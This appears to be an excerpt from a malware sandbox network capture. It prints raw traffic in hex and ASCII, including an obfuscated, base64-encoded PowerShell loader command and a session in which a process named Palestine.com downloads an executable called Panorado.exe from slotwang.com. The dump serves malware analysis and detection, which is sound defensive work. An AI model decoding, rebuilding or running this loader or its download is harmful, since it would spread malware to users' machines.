                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=THhImfkj08yVbskTEhPU6fCXZ7OijozVjxCcNJrmDKPfrCsZ6SlLdNpJzxQ7I6niyo0L19NblXdDUCA95DqidaowZ0ogD8lpFutDL%2Bt8Ig0ywnbhc%2Bb3w9IRJb3JSiwxlOeM8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675d235840c345-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1558&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=825&delivery_rate=1819314&cwnd=178&unsent_bytes=0&cid=08c07a115f9782b9&ts=607&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC464INData Raw: 2d 45 4e 63 20 4c 67 41 6f 41 43 67 41 52 77 42 46 41 46 51 41 4c 51 42 32 41 47 45 41 55 67 42 4a 41 45 45 41 51 67 42 4d 41 47 55 41 49 41 41 6e 41 43 6f 41 54 51 42 6b 41 48 49 41 4b 67 41 6e 41 43 6b 41 4c 67 42 75 41 47 45 41 54 51 42 6c 41 46 73 41 4d 77 41 73 41 44 45 41 4d 51 41 73 41 44 49 41 58 51 41 74 41 47 6f 41 62 77 42 4a 41 47 34 41 4a 77 41 6e 41 43 6b 41 49 41 41 6f 41 43 67 41 4b 41 41 6e 41 46 4d 41 52 51 42 30 41 43 30 41 64 67 42 68 41 46 49 41 53 51 42 68 41 45 49 41 62 41 42 6c 41 43 41 41 4b 41 41 32 41 46 4d 41 64 67 41 34 41 47 30 41 59 51 41 32 41 46 4d 41 64 67 41 72 41 44 59 41 55 77 42 32 41 45 59 41 57 67 41 32 41 46 4d 41 64 67 41 70 41 43 41 41 49 41 41 6f 41 43 41 41 57 77 42 55 41 46 6b 41 63 41 41 6e 41 43 73 41 4a 77
                                                                                                                                                                                                                                            Data Ascii: -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJw
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC1369INData Raw: 4c 41 47 38 41 55 67 42 4a 41 45 63 41 62 41 42 55 41 46 59 41 4b 51 41 70 41 44 73 41 49 41 42 7a 41 45 55 41 64 41 41 74 41 45 6b 41 56 41 42 6c 41 45 30 41 49 41 41 67 41 46 59 41 59 51 42 79 41 47 6b 41 59 51 42 69 41 47 77 41 5a 51 41 36 41 44 67 41 51 51 42 51 41 47 4d 41 49 41 41 67 41 43 67 41 49 41 42 62 41 46 51 41 65 51 42 77 41 47 55 41 58 51 41 6f 41 44 59 41 55 77 42 32 41 48 73 41 4d 51 42 39 41 48 73 41 4d 67 42 39 41 48 73 41 4d 41 42 39 41 43 63 41 4b 77 41 6e 41 44 59 41 55 77 42 32 41 43 41 41 4c 51 42 47 41 43 41 41 62 41 42 55 41 46 59 41 52 41 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 46 4d 41 57 51 42 7a 41 47 77 41 56 41 42 57 41 43 77 41 62 41 42 55 41 46 59 41 64 41 42 46 41 45 30 41 4c 67 42 6e 41 46 55 41 4a 77
                                                                                                                                                                                                                                            Data Ascii: LAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJw
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC1369INData Raw: 41 46 51 41 56 67 42 66 41 47 4d 41 62 41 42 77 41 46 38 41 63 41 42 68 41 47 34 41 4c 67 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 48 4d 41 4f 67 41 76 41 43 38 41 61 77 42 73 41 47 77 41 56 41 42 57 41 43 77 41 62 41 42 55 41 46 59 41 64 41 42 77 41 47 77 41 56 41 42 57 41 43 77 41 62 41 42 55 41 46 59 41 62 67 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 47 67 41 62 77 42 68 41 43 34 41 63 77 42 6f 41 43 63 41 4b 77 41 6e 41 47 38 41 62 41 42 55 41 46 59 41 4c 41 42 73 41 46 51 41 56 67 42 70 41 47 77 41 56 41 42 57 41 43 6b 41 43 67 41 67 41 43 41 41 49 41 41 67 41 46 4d 41 5a 51 42 30 41 43 30 41 56 67 42 68 41 48 49 41 61 51 42 68 41 47 49 41 62 41 42 6c 41 43 41 41 4c 51 42 4f 41 47 45 41 62 51 42 6c 41 43 41 41 64 77 42
                                                                                                                                                                                                                                            Data Ascii: AFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwB
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC1369INData Raw: 43 67 41 4e 67 42 54 41 48 59 41 65 77 41 79 41 48 30 41 65 77 41 7a 41 48 30 41 65 77 41 78 41 48 30 41 4a 77 41 72 41 43 63 41 65 77 41 77 41 48 30 41 4e 67 42 54 41 48 59 41 4c 51 42 6d 41 43 41 41 62 41 42 55 41 46 59 41 4a 77 41 72 41 43 63 41 59 51 42 74 41 47 77 41 56 41 42 57 41 43 77 41 62 41 42 55 41 46 59 41 55 77 42 30 41 48 49 41 5a 51 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 46 4d 41 65 51 42 7a 41 47 77 41 56 41 42 57 41 43 77 41 62 41 42 55 41 46 59 41 64 41 42 6c 41 47 30 41 4c 67 42 4a 41 45 38 41 4c 67 42 4e 41 47 55 41 62 51 42 76 41 48 49 41 65 51 42 73 41 46 51 41 56 67 41 70 41 43 6b 41 43 67 41 67 41 43 41 41 49 41 41 67 41 45 51 41 65 51 42 46 41 48 73 41 54 51 42 6c 41 47 30 41 51 67 42 56 41 47 30 41 62 77 42 79
                                                                                                                                                                                                                                            Data Ascii: CgANgBTAHYAewAyAH0AewAzAH0AewAxAH0AJwArACcAewAwAH0ANgBTAHYALQBmACAAbABUAFYAJwArACcAYQBtAGwAVABWACwAbABUAFYAUwB0AHIAZQBsAFQAVgAsAGwAVABWAFMAeQBzAGwAVABWACwAbABUAFYAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBsAFQAVgApACkACgAgACAAIAAgAEQAeQBFAHsATQBlAG0AQgBVAG0AbwBy
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC1369INData Raw: 30 41 56 67 42 68 41 48 49 41 61 51 42 68 41 47 49 41 62 41 42 6c 41 43 41 41 4c 51 42 4f 41 47 45 41 62 51 42 6c 41 43 41 41 51 51 42 77 41 46 41 41 52 41 42 42 41 46 51 41 59 51 42 51 41 47 45 41 56 41 42 49 41 43 41 41 4c 51 42 57 41 47 45 41 62 41 42 31 41 47 55 41 49 41 41 6f 41 45 51 41 65 51 42 46 41 47 4d 41 52 77 41 77 41 46 45 41 4f 67 41 36 41 43 67 41 4e 67 42 54 41 48 59 41 65 77 41 78 41 48 30 41 65 77 41 77 41 48 30 41 4e 67 42 54 41 48 59 41 49 41 41 74 41 47 59 41 62 41 42 55 41 43 63 41 4b 77 41 6e 41 46 59 41 5a 51 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 45 4d 41 62 77 42 74 41 47 49 41 61 51 42 75 41 43 63 41 4b 77 41 6e 41 47 77 41 56 41 42 57 41 43 6b 41 4c 67 42 4a 41 47 34 41 64 67 42 76 41 47 73 41 5a 51 41 6f 41
                                                                                                                                                                                                                                            Data Ascii: 0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAQQBwAFAARABBAFQAYQBQAGEAVABIACAALQBWAGEAbAB1AGUAIAAoAEQAeQBFAGMARwAwAFEAOgA6ACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYAIAAtAGYAbABUACcAKwAnAFYAZQBsAFQAVgAsAGwAVABWAEMAbwBtAGIAaQBuACcAKwAnAGwAVABWACkALgBJAG4AdgBvAGsAZQAoA
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC1369INData Raw: 41 4f 67 42 30 41 45 55 41 51 67 42 56 41 47 30 41 62 51 41 6e 41 43 73 41 4a 77 42 77 41 48 30 41 4c 41 41 67 41 44 59 41 55 77 42 32 41 45 51 41 65 51 42 46 41 48 55 41 62 67 42 70 41 43 63 41 4b 77 41 6e 41 48 45 41 64 51 42 6c 41 45 59 41 62 77 42 73 41 47 51 41 5a 51 42 79 41 45 34 41 59 51 42 74 41 43 63 41 4b 77 41 6e 41 47 55 41 4c 67 42 36 41 47 6b 41 63 41 41 32 41 46 4d 41 64 67 41 70 41 43 6b 41 43 67 41 67 41 43 41 41 49 41 41 67 41 43 41 41 49 41 41 6f 41 43 41 41 49 41 42 6e 41 45 4d 41 61 51 41 67 41 43 67 41 4e 67 42 54 41 48 59 41 64 67 42 42 41 44 59 41 55 77 42 32 41 43 73 41 4e 67 42 54 41 48 59 41 63 67 41 32 41 46 4d 41 64 67 41 72 41 44 59 41 55 77 42 32 41 47 6b 41 51 51 42 69 41 47 77 41 5a 51 41 36 41 46 55 41 59 67 41 79 41 45
                                                                                                                                                                                                                                            Data Ascii: AOgB0AEUAQgBVAG0AbQAnACsAJwBwAH0ALAAgADYAUwB2AEQAeQBFAHUAbgBpACcAKwAnAHEAdQBlAEYAbwBsAGQAZQByAE4AYQBtACcAKwAnAGUALgB6AGkAcAA2AFMAdgApACkACgAgACAAIAAgACAAIAAoACAAIABnAEMAaQAgACgANgBTAHYAdgBBADYAUwB2ACsANgBTAHYAcgA2AFMAdgArADYAUwB2AGkAQQBiAGwAZQA6AFUAYgAyAE
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC1369INData Raw: 4b 41 42 45 41 48 6b 41 52 51 42 37 41 48 4d 41 61 41 42 43 41 46 55 41 62 51 42 6c 41 47 77 41 62 41 42 39 41 43 34 41 4b 41 41 32 41 46 4d 41 64 67 42 37 41 44 41 41 66 51 42 37 41 44 45 41 66 51 42 37 41 44 49 41 66 51 41 32 41 46 4d 41 4a 77 41 72 41 43 63 41 64 67 41 6e 41 43 73 41 4a 77 41 67 41 43 30 41 5a 67 42 73 41 46 51 41 56 67 42 4f 41 47 45 41 62 51 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 47 55 41 55 77 42 77 41 47 45 41 62 41 42 55 41 46 59 41 4c 41 42 73 41 46 51 41 56 67 42 6a 41 47 55 41 62 41 42 55 41 46 59 41 4b 51 41 75 41 45 6b 41 62 67 42 32 41 47 38 41 61 77 42 6c 41 43 67 41 52 41 42 35 41 45 55 41 65 77 42 30 41 45 55 41 62 51 42 77 41 48 6f 41 51 67 42 56 41 47 30 41 53 51 42 51 41 48 41 41 51 51 42 43 41 46 55
                                                                                                                                                                                                                                            Data Ascii: KABEAHkARQB7AHMAaABCAFUAbQBlAGwAbAB9AC4AKAA2AFMAdgB7ADAAfQB7ADEAfQB7ADIAfQA2AFMAJwArACcAdgAnACsAJwAgAC0AZgBsAFQAVgBOAGEAbQBsAFQAVgAsAGwAVABWAGUAUwBwAGEAbABUAFYALABsAFQAVgBjAGUAbABUAFYAKQAuAEkAbgB2AG8AawBlACgARAB5AEUAewB0AEUAbQBwAHoAQgBVAG0ASQBQAHAAQQBCAFU
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC1335INData Raw: 51 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 45 4d 41 61 41 42 70 41 47 77 41 5a 41 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 43 63 41 4b 77 41 6e 41 48 51 41 5a 51 42 74 41 47 77 41 56 41 42 57 41 43 6b 41 49 41 41 74 41 43 63 41 4b 77 41 6e 41 45 59 41 61 51 42 73 41 48 51 41 5a 51 42 79 41 43 41 41 4b 67 41 75 41 45 49 41 56 51 42 74 41 47 55 41 57 41 42 46 41 43 41 41 4c 51 42 53 41 47 55 41 59 77 42 31 41 48 49 41 63 77 42 6c 41 43 41 41 4c 51 42 51 41 47 45 41 64 41 42 6f 41 43 41 41 52 41 42 35 41 45 55 41 65 77 42 68 41 46 41 41 51 67 42 56 41 47 30 41 63 41 42 43 41 46 55 41 62 51 42 6b 41 47 45 41 51 67 42 56 41 47 30 41 56 41 42 42 41 46 41 41 51 51 42 55 41 47 67 41 66 51 41 70 41 41 6f 41 49 41 41 67 41 43 41 41
                                                                                                                                                                                                                                            Data Ascii: QBsAFQAVgAsAGwAVABWAEMAaABpAGwAZABsAFQAVgAsAGwAVABWACcAKwAnAHQAZQBtAGwAVABWACkAIAAtACcAKwAnAEYAaQBsAHQAZQByACAAKgAuAEIAVQBtAGUAWABFACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAARAB5AEUAewBhAFAAQgBVAG0AcABCAFUAbQBkAGEAQgBVAG0AVABBAFAAQQBUAGgAfQApAAoAIAAgACAA


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            9192.168.2.164971045.66.248.1344436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:52 UTC204OUTGET /file/Panorado.exe HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: slotwang.com
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC265INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:52 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                            Content-Length: 18610385
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Last-Modified: Sun, 22 Dec 2024 20:02:20 GMT
                                                                                                                                                                                                                                            ETag: "11bf8d1-629e15b83ab00"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC16119INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC16384INData Raw: 00 fc 4a 40 00 0d 0a 54 54 79 70 65 54 61 62 6c 65 fc ff ff 7f ff ff ff 1f 00 11 40 00 01 00 00 00 00 02 00 00 20 4b 40 00 14 0a 50 54 79 70 65 54 61 62 6c 65 f8 4a 40 00 02 00 00 00 38 4b 40 00 14 10 50 50 61 63 6b 61 67 65 54 79 70 65 49 6e 66 6f 50 4b 40 00 02 00 54 4b 40 00 0e 10 54 50 61 63 6b 61 67 65 54 79 70 65 49 6e 66 6f 10 00 00 00 00 00 00 00 00 04 00 00 00 9c 10 40 00 00 00 00 00 02 09 54 79 70 65 43 6f 75 6e 74 02 00 1c 4b 40 00 04 00 00 00 02 09 54 79 70 65 54 61 62 6c 65 02 00 9c 10 40 00 08 00 00 00 02 09 55 6e 69 74 43 6f 75 6e 74 02 00 5c 2a 40 00 0c 00 00 00 02 09 55 6e 69 74 4e 61 6d 65 73 02 00 02 00 00 00 00 d0 4b 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 42 79 74 65 3e 01 00 00 00 00 00 00 00 11 00 00 00 b4 10 40 00 06
                                                                                                                                                                                                                                            Data Ascii: J@TTypeTable@ K@PTypeTableJ@8K@PPackageTypeInfoPK@TK@TPackageTypeInfo@TypeCountK@TypeTable@UnitCount\*@UnitNamesK@TArray<System.Byte>@
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC16384INData Raw: 89 1a 33 c0 5a 59 59 64 89 10 68 1b 8b 40 00 8b 45 fc 83 c0 18 e8 07 f9 ff ff 58 ff e0 e9 3b 05 00 00 eb eb 5e 5b 59 5d c3 53 8b d8 83 3d f8 d8 4a 00 00 75 07 b0 1a e8 71 e5 ff ff 8b c3 e8 e6 fd ff ff e8 05 00 00 00 5b c3 8d 40 00 53 8b d8 e8 94 c6 ff ff 3b 43 08 75 07 ff 43 04 b0 01 5b c3 83 3b 00 75 22 33 c0 ba 01 00 00 00 f0 0f b1 13 85 c0 75 13 e8 6f c6 ff ff 89 43 08 c7 43 04 01 00 00 00 b0 01 eb 02 33 c0 5b c3 90 55 8b ec 83 c4 e8 53 56 57 89 4d fc 8b da 8b f0 33 c0 89 45 e8 8b c3 e8 94 f9 ff ff 89 45 ec 8b 3d f8 d8 4a 00 ff 57 08 89 45 f0 33 c0 55 68 28 8c 40 00 64 ff 30 64 89 20 8b 43 04 89 45 f4 8d 55 e8 8b c6 e8 3f fe ff ff c7 43 04 01 00 00 00 8b c3 e8 59 fc ff ff 8b 3d f8 d8 4a 00 8b 4d fc 8b 55 f0 33 c0 ff 57 10 85 c0 0f 94 45 fb 8b c3 83 ca
                                                                                                                                                                                                                                            Data Ascii: 3ZYYdh@EX;^[Y]S=Juq[@S;CuC[;u"3uoCC3[USVWM3EE=JWE3Uh(@d0d CEU?CY=JMU3WE
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC16384INData Raw: c6 8b 4d f8 8b 09 8d 04 01 8b 4d f4 2b cf 0f af ce e8 43 a8 ff ff 85 db 74 18 0f af fe 8b 45 f8 8b 00 03 c7 6a 01 8b 55 fc 8b cb e8 91 f1 ff ff eb 7d 83 fe 08 75 1b 8b c7 c1 e0 03 8b 55 f8 8b 12 8b 4d fc 8b 19 89 1c 02 8b 59 04 89 5c 02 04 eb 5d 83 fe 04 75 14 8b c7 c1 e0 02 8b 55 f8 8b 12 8b 4d fc 8b 09 89 0c 02 eb 44 83 fe 02 75 15 8b c7 03 c0 8b 55 f8 8b 12 8b 4d fc 0f b7 09 66 89 0c 02 eb 2a 83 fe 01 75 10 8b 45 f8 8b 00 8b 55 fc 0f b6 12 88 14 38 eb 15 0f af fe 8b 45 f8 8b 00 8d 14 38 8b 45 fc 8b ce e8 aa a7 ff ff 5f 5e 5b 8b e5 5d c2 04 00 90 53 56 81 c4 f4 fd ff ff 8b d8 83 7b 10 00 75 2b 68 05 01 00 00 8d 44 24 04 50 8b 43 04 50 e8 65 86 ff ff 8b c4 b2 01 e8 94 12 00 00 8b f0 89 73 10 85 f6 75 06 8b 43 04 89 43 10 8b 43 10 81 c4 0c 02 00 00 5e 5b
                                                                                                                                                                                                                                            Data Ascii: MM+CtEjU}uUMY\]uUMDuUMf*uEU8E8E_^[]SV{u+hD$PCPesuCCC^[
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC16384INData Raw: c6 8b 08 ff 51 2c 8b f8 8b d7 8b c6 e8 18 00 00 00 84 c0 74 09 8b d3 8b c6 8b 08 ff 51 24 4b 83 fb ff 75 d9 5f 5e 5b c3 90 55 8b ec 83 c4 f4 89 55 fc 8b 45 fc 8b 00 e8 ed 7f ff ff 88 45 fb 80 7d fb 00 74 65 33 d2 55 68 9a 0b 41 00 64 ff 32 64 89 22 8b 45 fc 8b 00 f6 40 0c 01 75 03 ff 48 08 33 c0 5a 59 59 64 89 10 68 a1 0b 41 00 8b 45 fc 8b 00 83 78 08 00 75 1e e8 07 7d ff ff 8b 45 fc 89 45 f4 8b 45 f4 8b 00 8b 55 f4 33 c9 89 0a e8 5c 72 ff ff eb 09 e8 e9 7c ff ff c6 45 fb 00 58 ff e0 e9 b5 84 ff ff eb c4 0f b6 45 fb 8b e5 5d c3 8d 40 00 53 56 e8 b1 77 ff ff 8b da 8b f0 8b 46 04 e8 29 72 ff ff b2 fc 22 d3 8b c6 e8 0e 72 ff ff 84 db 7e 07 8b c6 e8 37 77 ff ff 5e 5b c3 c3 8d 40 00 ff 05 5c 06 4b 00 c3 90 ff 25 14 55 4b 00 8b c0 ff 25 24 55 4b 00 8b c0 ff 25
                                                                                                                                                                                                                                            Data Ascii: Q,tQ$Ku_^[UUEE}te3UhAd2d"E@uH3ZYYdhAExu}EEEU3\r|EXE]@SVwF)r"r~7w^[@\K%UK%$UK%
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC16384INData Raw: 07 07 07 0c 0c 0c 0c 0c 02 02 02 02 02 05 05 02 05 05 05 05 05 05 05 02 05 05 02 02 02 07 07 07 07 07 07 07 1a 1a 0f 0f 0f 0f 0f 0f 0f 07 07 07 07 07 07 07 07 07 07 02 02 02 02 02 15 07 07 07 07 07 07 07 07 02 02 02 02 0f 0f 07 07 17 17 0f 0f 0f 0f 0f 0f 1a 17 07 15 0c 02 07 0c 0c 0c 02 0c 0c 02 02 02 02 02 0c 0c 0c 0c 06 06 1a 15 15 15 06 02 02 0c 17 17 19 18 1a 17 17 02 1a 19 19 19 19 1a 1a 02 07 07 07 07 07 07 07 07 1a 07 07 07 07 07 07 07 07 07 07 07 0a 0a 0c 0c 0c 0c 0c 02 02 02 0a 0a 0a 0c 0c 0c 0c 0c 0c 0c 0c 02 02 02 02 02 02 02 02 02 02 02 07 07 07 07 07 0c 0c 02 02 02 02 0f 0f 0f 0f 0f 07 07 07 07 07 07 02 02 02 15 15 15 15 15 15 15 06 15 15 15 15 15 15 02 02 07 07 07 07 07 07 02 02 0f 0f 0f 0f 0f 0f 0f 0f 0f 1a 07 07 07 07 07 07 07 07 07 07 07
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC16384INData Raw: 00 50 89 41 00 f8 7e 40 00 00 7f 40 00 04 2f 42 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 34 2e 42 00 ac 2e 42 00 78 2e 42 00 00 00 00 00 02 00 09 45 49 6e 74 45 72 72 6f 72 44 8b 41 00 07 09 45 49 6e 74 45 72 72 6f 72 28 8b 41 00 e4 89 41 00 00 00 0f 53 79 73 74 65 6d 2e 53 79 73 55 74 69 6c 73 00 00 00 00 02 00 00 00 00 00 00 cc 8b 41 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 8b 41 00 00 00 00 00 d4 8b 41 00 00 00 00 00 da 8b 41 00 20 00 00 00 d0 8a 41 00 f8 7e 40 00 00 7f 40 00 04 2f 42 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 34 2e 42 00 ac 2e 42 00 78 2e 42 00 00 00 00 00 02 00 0a 45 44 69 76 42 79 5a 65 72 6f 00 00 00 ec 8b 41 00 07 0a 45 44 69 76 42 79 5a 65
                                                                                                                                                                                                                                            Data Ascii: PA~@@/B@@@@@}@}@4.B.Bx.BEIntErrorDAEIntError(AASystem.SysUtilsAAAA A~@@/B@@@@@}@}@4.B.Bx.BEDivByZeroAEDivByZe
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC16384INData Raw: ff 00 81 7d f4 b3 b6 e0 0d 75 07 81 7d f0 00 00 64 a7 73 da 83 45 e4 02 8b 45 e4 66 c7 00 30 00 eb 14 81 6d f0 00 00 8a 5d 81 5d f4 78 45 63 01 8b 45 e4 66 ff 00 81 7d f4 78 45 63 01 75 07 81 7d f0 00 00 8a 5d 73 da 83 45 e4 02 b3 11 8b 45 f0 89 45 e8 8b 45 f4 89 45 ec 6a 00 68 00 e1 f5 05 8b 45 f0 8b 55 f4 e8 a5 f4 fe ff 89 45 f0 89 55 f4 6a 00 68 00 e1 f5 05 8b 45 f0 8b 55 f4 e8 d5 f3 fe ff 29 45 e8 19 55 ec 8b 7d e8 8b c7 e8 19 fd ff ff 8b f0 6b c6 64 2b f8 8b 04 bd de ab 4a 00 0f b6 d3 03 d2 03 55 e4 83 ea 04 89 02 8b fe 8b c6 e8 f5 fc ff ff 8b f0 6b c6 64 2b f8 8b 04 bd de ab 4a 00 0f b6 d3 03 d2 03 55 e4 83 ea 08 89 02 8b fe 8b c6 e8 d1 fc ff ff 8b f0 6b c6 64 2b f8 8b 04 bd de ab 4a 00 0f b6 d3 03 d2 03 55 e4 83 ea 0c 89 02 8b 04 b5 de ab 4a 00 0f
                                                                                                                                                                                                                                            Data Ascii: }u}dsEEf0m]]xEcEf}xEcu}]sEEEEEjhEUEUjhEU)EU}kd+JUkd+JUkd+JUJ
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC16384INData Raw: 4d de 8b 55 e8 8b 45 ec e8 e4 f8 ff ff 85 c0 75 07 33 db e9 ec 01 00 00 80 4d d7 01 e9 0d 01 00 00 f6 45 d7 08 74 07 33 db e9 d6 01 00 00 8b 45 ec 85 c0 74 05 83 e8 04 8b 00 8b 55 e8 3b 02 7c 10 8b 45 e8 8b 00 8b 55 ec 66 83 7c 42 fe 20 75 0a 80 7b 04 00 0f 84 e0 00 00 00 80 3b 07 75 4b 83 7d fc 00 75 4a 8b 45 08 8b 80 bc 00 00 00 85 c0 74 05 83 e8 04 8b 00 48 78 29 8b 45 08 8b 80 bc 00 00 00 85 c0 74 05 83 e8 04 8b 00 48 8d 04 40 8b 55 08 8b 92 bc 00 00 00 8b 44 c2 04 48 89 45 fc eb 0c 33 db e9 59 01 00 00 33 c0 89 45 fc 80 7b 01 02 77 16 83 ff 40 74 0a 0f b6 43 04 04 fc 2c 04 72 07 be 04 00 00 00 eb 04 0f b6 73 01 56 8d 4d e2 8b 55 e8 8b 45 ec e8 12 f8 ff ff 8b f0 85 f6 75 07 33 db e9 18 01 00 00 83 fe 02 7f 09 80 3b 04 75 04 80 4d d7 20 80 4d d7 08 eb
                                                                                                                                                                                                                                            Data Ascii: MUEu3MEt3EtU;|EUf|B u{;uK}uJEtHx)EtH@UDHE3Y3E{w@tC,rsVMUEu3;uM M
                                                                                                                                                                                                                                            2024-12-23 09:35:53 UTC16384INData Raw: 33 c9 89 4d fc 89 55 f8 8b d8 33 c0 55 68 3d 4b 42 00 64 ff 30 64 89 20 8d 45 fc e8 99 95 fe ff 8b c8 8b 55 f8 8b c3 e8 05 ff ff ff 8b d8 33 c0 5a 59 59 64 89 10 68 44 4b 42 00 8d 45 fc e8 76 95 fe ff 58 ff e0 e9 12 45 fe ff eb ee 8b c3 5b 59 59 5d c3 90 55 8b ec 83 c4 f4 53 8b d8 52 e8 99 c3 fe ff 89 45 f4 33 c0 55 68 c2 4b 42 00 64 ff 30 64 89 20 d9 7d fe 33 c0 55 68 a2 4b 42 00 64 ff 30 64 89 20 8b c3 e8 10 59 fe ff 50 e8 0a c3 fe ff 89 45 f8 33 c0 5a 59 59 64 89 10 68 a9 4b 42 00 db e2 d9 6d fe 58 ff e0 e9 ad 44 fe ff eb f1 33 c0 5a 59 59 64 89 10 68 c9 4b 42 00 8b 45 f4 50 e8 35 c3 fe ff 58 ff e0 e9 8d 44 fe ff eb ed 8b 45 f8 5b 8b e5 5d c3 8d 40 00 55 8b ec 53 8b 5d 10 53 8b 5d 0c 53 0f b6 5d 08 53 8b 1d b4 06 4b 00 53 e8 5f 01 00 00 5b 5d c2 0c 00
                                                                                                                                                                                                                                            Data Ascii: 3MU3Uh=KBd0d EU3ZYYdhDKBEvXE[YY]USRE3UhKBd0d }3UhKBd0d YPE3ZYYdhKBmXD3ZYYdhKBEP5XDE[]@US]S]S]SKS_[]


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
